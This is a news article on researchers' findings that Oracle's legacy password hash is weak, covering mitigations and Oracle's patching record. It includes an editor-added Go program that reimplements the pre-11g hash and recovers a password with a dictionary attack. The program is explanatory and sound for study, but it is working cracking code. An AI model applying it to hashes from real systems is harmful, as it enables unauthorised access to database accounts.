
Oracle security undermined yet again

Researchers add to glut of concerns.


Oracle's security practices have come under a fresh attack from two security researchers who claim the database maker's products have serious password-protection weaknesses.

Joshua Wright of the SANS Institute and Dr Carlos Cid of the Information Security Group at the Royal Holloway, University of London, have published a paper outlining problems with Oracle's password system that they say make it "straightforward" to recover users' passwords. Wright gave a presentation on the matter at the SANS Network Security conference in Los Angeles earlier this week, SANS said.

The problem centres on the hashing algorithm Oracle uses to protect stored passwords, which the researchers described as "weak" and subject to several attacks. If an attacker were able to obtain password hashes from a compromised system, the weakness would let them recover the plaintext passwords and so gain access to whatever those passwords protect, said Cid and Wright.

Possible ways for an attacker to obtain the hashes in the first place include sniffing the database's network (TNS) traffic or SQL injection against an application with access to the database, they said.

"The current mechanism presents a number of weaknesses, making it straightforward for an attacker with limited resources to recover a user's plaintext password from the hashed value," Cid and Wright wrote in the paper. Even strong passwords could be vulnerable to this type of attack, they said.

Password recovery wouldn't need complex or even custom-made software, but could be carried out with simple, off-the-shelf components, they said. "By exploiting these weaknesses, an adversary with limited resources can mount an attack that would reveal the plaintext password from the password hash for a known user," Cid and Wright wrote.
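The two properties behind the researchers' claim, a fixed key with no random salt and case folding of the password, are easy to see by reproducing the hash. The Go program below is an example added here by the editor; it is not code from the article or from the Wright and Cid paper. It implements the pre-11g Oracle password hash as publicly documented (uppercase the username and password, widen each character to two bytes, zero-pad to the DES block size, DES-CBC under the fixed key 0x0123456789ABCDEF with a zero IV, then DES-CBC again keyed with the last block of the first pass) and runs a constructed four-word dictionary against a hash to recover the password. Only ASCII usernames and passwords are handled, and the wordlist is constructed for the example. Later Oracle releases introduced a different, salted and case-sensitive hash, so this reproduces the scheme the article is about, not a current one.

```go
package main

import (
	"crypto/cipher"
	"crypto/des"
	"encoding/hex"
	"errors"
	"fmt"
	"strings"
)

// fixedKey is the constant DES key hard-coded into the legacy algorithm.
// Because it is the same for every database, the only per-user input to
// the hash is the username: there is no random salt.
var fixedKey = []byte{0x01, 0x23, 0x45, 0x67, 0x89, 0xab, 0xcd, 0xef}

// legacyPlaintext builds the data that gets hashed: upper(username || password),
// each character widened to two bytes (0x00, ch), zero-padded to the DES
// block size. Assumption of this example: ASCII-only usernames and passwords.
func legacyPlaintext(username, password string) []byte {
	s := strings.ToUpper(username + password)
	buf := make([]byte, 0, 2*len(s)+des.BlockSize)
	for i := 0; i < len(s); i++ {
		buf = append(buf, 0x00, s[i])
	}
	for len(buf)%des.BlockSize != 0 {
		buf = append(buf, 0x00)
	}
	return buf
}

// lastBlockCBC encrypts pt with single DES in CBC mode under key and an
// all-zero IV and returns only the final ciphertext block.
func lastBlockCBC(key, pt []byte) ([]byte, error) {
	block, err := des.NewCipher(key) // key parity bits are ignored by Go's DES
	if err != nil {
		return nil, err
	}
	iv := make([]byte, des.BlockSize)
	ct := make([]byte, len(pt))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, pt)
	return ct[len(ct)-des.BlockSize:], nil
}

// LegacyOracleHash returns the 16-hex-digit pre-11g Oracle password hash:
// pass 1 under the fixed key yields a second key; pass 2 under that key
// yields the hash.
func LegacyOracleHash(username, password string) (string, error) {
	if username+password == "" {
		return "", errors.New("empty username and password")
	}
	pt := legacyPlaintext(username, password)
	k2, err := lastBlockCBC(fixedKey, pt)
	if err != nil {
		return "", err
	}
	h, err := lastBlockCBC(k2, pt)
	if err != nil {
		return "", err
	}
	return strings.ToUpper(hex.EncodeToString(h)), nil
}

// CrackHash hashes each candidate under a known username and returns the
// first one matching hash, or "" if none does. Any letter case of the
// returned word will authenticate, since the hash folds case.
func CrackHash(username, hash string, candidates []string) string {
	want := strings.ToUpper(hash)
	for _, c := range candidates {
		if h, err := LegacyOracleHash(username, c); err == nil && h == want {
			return c
		}
	}
	return ""
}

func main() {
	h, _ := LegacyOracleHash("SCOTT", "TIGER")
	fmt.Println("SCOTT/TIGER ->", h)
	h2, _ := LegacyOracleHash("scott", "tiger")
	fmt.Println("same hash for 'scott'/'tiger':", h == h2)
	// Constructed wordlist for this example; a real attack would use a large
	// dictionary, hashed once per known account name such as SYS or SYSTEM.
	words := []string{"manager", "welcome1", "tiger", "oracle"}
	fmt.Println("recovered password:", CrackHash("SCOTT", h, words))
}
```

Two things follow directly from the code: the case fold cuts the effective keyspace of a mixed-case password before the attack even starts, and because the username is the only per-user input, a wordlist hashed once against a well-known account name (SYS, SYSTEM) is reusable against every Oracle installation, which is what makes precomputation attractive.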

One way of limiting the danger for now would be to enforce a strong password policy among users and to ensure each user holds only the minimum privileges they need, so that a recovered password yields as little as possible, the paper said. Administrators could also put other protections in place, such as encrypting TNS traffic so that hashes cannot be captured off the network, the researchers said.

A better solution, though, would be for Oracle to improve its password management system, they said. The SANS Institute said it contacted Oracle about the problems in mid-July, but that Oracle has not said when, or whether, it plans to take any action. SANS urged users to raise the issue with Oracle themselves.

Oracle has come under increasing pressure over its security practices this year. The company has repeatedly issued critical security patches that don't work - its October patches didn't fix all the problems they were supposed to address, and in July, Oracle released two sets of database patches to fix flaws in previously released security patches. One of the affected fixes in July was itself a fix to an earlier set of patches - in other words, a patch for a patch for a patch.

Earlier this year a German security firm released details of several high-risk Oracle flaws, along with workarounds, claiming to have seen no action from Oracle two years after reporting the bugs. The firm said the delay was more evidence that Oracle's patching system is in disarray.

Oracle has said it stands behind the security of its products and takes security seriously.
